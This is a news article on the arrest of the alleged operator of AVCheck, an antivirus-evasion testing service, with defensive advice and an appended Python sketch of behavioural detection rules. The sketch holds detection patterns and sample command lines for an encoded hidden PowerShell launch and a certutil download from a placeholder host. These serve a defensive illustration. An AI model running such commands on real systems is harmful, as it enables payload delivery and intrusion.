Dutch law enforcement has arrested a 33‑year‑old national suspected of running AVCheck, an online malware testing and antivirus evasion platform widely used by cybercriminals. The service, which allowed attackers to fine‑tune malicious code to bypass security tools, was taken offline in May 2025 during the international cybercrime operation Endgame.
Arrest at Schiphol and Links to the AVCheck Malware Testing Service
According to the Dutch Public Prosecution Service (Openbaar Ministerie, OM), the suspect was detained at Amsterdam’s Schiphol Airport. His name has not been disclosed. Investigators state that he left the Netherlands for the United Arab Emirates shortly after AVCheck was shut down and was placed under international surveillance before his arrest.
During the operation, authorities seized multiple data carriers and electronic devices for digital forensics. These will be examined to map AVCheck’s infrastructure, identify customers, and determine whether the platform was linked to specific malware campaigns or ransomware attacks.
Prosecutors associate the suspect with two corporate entities that allegedly acted as front companies for selling access to AVCheck. This “shell company” approach is typical in cybercrime infrastructure: services are publicly framed as legitimate “security testing” or “penetration testing” tools while in practice being marketed in underground forums as crimeware‑as‑a‑service offerings.
What Was AVCheck? Inside a Malware QA and Antivirus Evasion Platform
Investigators describe AVCheck as one of the largest international services for testing and bypassing antivirus and endpoint protection. The platform enabled users to upload malware samples and check whether they were detected by a range of commercial antivirus (AV), endpoint detection and response (EDR) and other security products.
In concept, AVCheck played a role for attackers similar to that of legitimate penetration‑testing or red‑team platforms for defenders. Instead of verifying that security tools correctly block threats, criminals used AVCheck to iteratively refine malware until it no longer triggered signature‑based or behavioral detections.
Unlike public multi‑scanner services that share samples with security vendors, underground anti‑AV platforms typically operate as “no‑distribute” services. They promise customers that uploaded samples will not be forwarded to antivirus companies, thereby preventing rapid signature updates and significantly extending the malware’s lifetime.
Why Antivirus Evasion Services Pose a Critical Cybersecurity Risk
Modern cybercriminal operations resemble professional software development teams. They version their tools, track detection rates, and run quality assurance (QA) against security stacks before launching campaigns. Anti‑AV platforms such as AVCheck are a core component of this workflow.
By pre‑testing payloads, threat actors can:
- Increase dwell time — undetected malware can persist in victim networks for weeks, enabling data theft, lateral movement, and ransomware staging.
- Systematically evade defenses — code is iteratively modified until it bypasses firewalls, email filters, EDR rules, and sandboxing solutions.
- Complicate incident response and forensics — heavily obfuscated and tested malware leaves fewer reliable indicators of compromise for defenders to pivot on.
Industry threat reports from organizations such as ENISA and Verizon regularly note a trend toward customized, well‑tested tooling in major intrusions and ransomware incidents. Platforms like AVCheck accelerate this trend by making advanced detection‑evasion capabilities accessible even to relatively inexperienced actors.
Operation Endgame: Targeting the Cybercrime Ecosystem, Not Just Individual Hackers
The shutdown of AVCheck on 27 May 2025 forms part of the second wave of Operation Endgame, a coordinated international law‑enforcement campaign led by the Netherlands, the United States, Finland and other partners. Rather than focusing solely on specific ransomware groups or botnet operators, Endgame targets the infrastructure layer that underpins large‑scale cybercrime.
This includes bulletproof hosting, botnets, loaders and droppers, command‑and‑control (C2) panels, and specialized services such as malware testing platforms. By removing these enablers, authorities seek to disrupt entire ecosystems rather than just individual campaigns.
The AVCheck case also highlights a broader strategic shift: geographical borders are becoming less effective as a shield for cybercriminals. Even when suspects move to jurisdictions with different legal frameworks, mutual legal assistance, joint task forces, and intelligence sharing increasingly enable cross‑border tracking and arrests.
Pressure on the Crimeware‑as‑a‑Service Model
From a security perspective, the most important impact of such operations is on the crimeware‑as‑a‑service (CaaS) model. In CaaS ecosystems, one group develops malware, another provides infrastructure and operational tools, and affiliates execute attacks for a share of the profits. This division of labor lowers the barrier to entry and industrializes cybercrime.
Removing services like AVCheck raises the cost and complexity of running campaigns. Threat actors must migrate to smaller, more closed darknet communities, invest in proprietary testing labs, or build replacement platforms. All of these options demand more expertise, time and money, and increase the likelihood of operational mistakes that defenders and law enforcement can exploit.
What Organizations Should Expect After the AVCheck Takedown
The arrest of the alleged AVCheck operator is unlikely to end malware QA and antivirus evasion. A portion of this capability will almost certainly move to private or invite‑only services, bespoke testing environments, and tightly controlled underground markets.
Enterprises should therefore assume that any serious intrusion attempt has been pre‑tested against common security products. Effective defense depends less on any single tool and more on a resilient, layered architecture and mature operational processes.
Key measures include:
- Defense‑in‑depth: hardened endpoints, network segmentation, strict privilege management, and monitored remote access pathways.
- Behavioral and anomaly‑based detection: EDR, NDR and SIEM rules that spot suspicious patterns and living‑off‑the‑land techniques, not just known signatures.
- Proactive testing: regular red‑teaming and purple‑teaming exercises to validate how well controls stand up to realistic attacker techniques, including AV‑evasion tactics.
- Updated security policies and playbooks: procedures that reflect modern attacker methods such as fileless malware, LOLBins, and multi‑stage loaders.
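To make the contrast between signature-based and behavioral detection concrete, here is an added example (not code from the article or from any product it mentions) in which a one-byte change to a constructed payload defeats a hash blocklist, while simple process-lineage and command-line rules, in the spirit of EDR/SIEM living-off-the-land detections, still flag constructed events. All payload bytes, hashes, log events and rule names are made up for illustration.

```python
import hashlib
import re

# Constructed illustration: a hash blocklist (signature) versus behavioural rules.
# Payload bytes, hashes and events below are invented for this example.
ORIGINAL_PAYLOAD = b"MZ\x90\x00 constructed-sample-v1"
MUTATED_PAYLOAD = ORIGINAL_PAYLOAD + b"\x00"   # one-byte change: same behaviour, new hash

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Signature-style control: blocks only hashes the vendor already knows.
KNOWN_BAD_HASHES = {sha256(ORIGINAL_PAYLOAD)}

def signature_hit(data: bytes) -> bool:
    return sha256(data) in KNOWN_BAD_HASHES

# Behaviour-style control: rules over parent/child lineage and command lines,
# which survive trivial re-packing of the payload.
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe"}
RULES = [
    ("office_spawns_shell",
     lambda e: e["parent"] in OFFICE_APPS and e["image"] in SHELLS),
    ("encoded_powershell",
     lambda e: e["image"] == "powershell.exe"
     and re.search(r"(?i)\s-(e|enc|encodedcommand)\s", e["cmdline"]) is not None),
    ("certutil_download",
     lambda e: e["image"] == "certutil.exe" and "-urlcache" in e["cmdline"].lower()),
]

def behaviour_hits(event: dict) -> list[str]:
    """Return the names of every rule the event matches."""
    return [name for name, match in RULES if match(event)]

# Constructed process-creation events, normalised as a SIEM might store them.
EVENTS = [
    {"parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe --profile-directory=Default"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUJDREVGRw=="},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"},
]

def triage(events: list[dict]) -> dict[str, list[str]]:
    """Map each flagged event's image name to the rules it triggered."""
    return {e["image"]: behaviour_hits(e) for e in events if behaviour_hits(e)}
```

Running `triage(EVENTS)` flags the PowerShell and certutil events while the browser launch stays clean, even though `signature_hit(MUTATED_PAYLOAD)` is already false.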
The AVCheck investigation underlines a crucial development in cyber defense: law enforcement is increasingly dismantling the services and infrastructure that make large‑scale cybercrime possible. At the same time, organizations cannot rely solely on external actions. Building robust monitoring, continuous security assessments, and a culture of incident readiness remains essential. Assuming that adversaries have already tested their tools against standard protections is a realistic starting point for any serious cybersecurity strategy.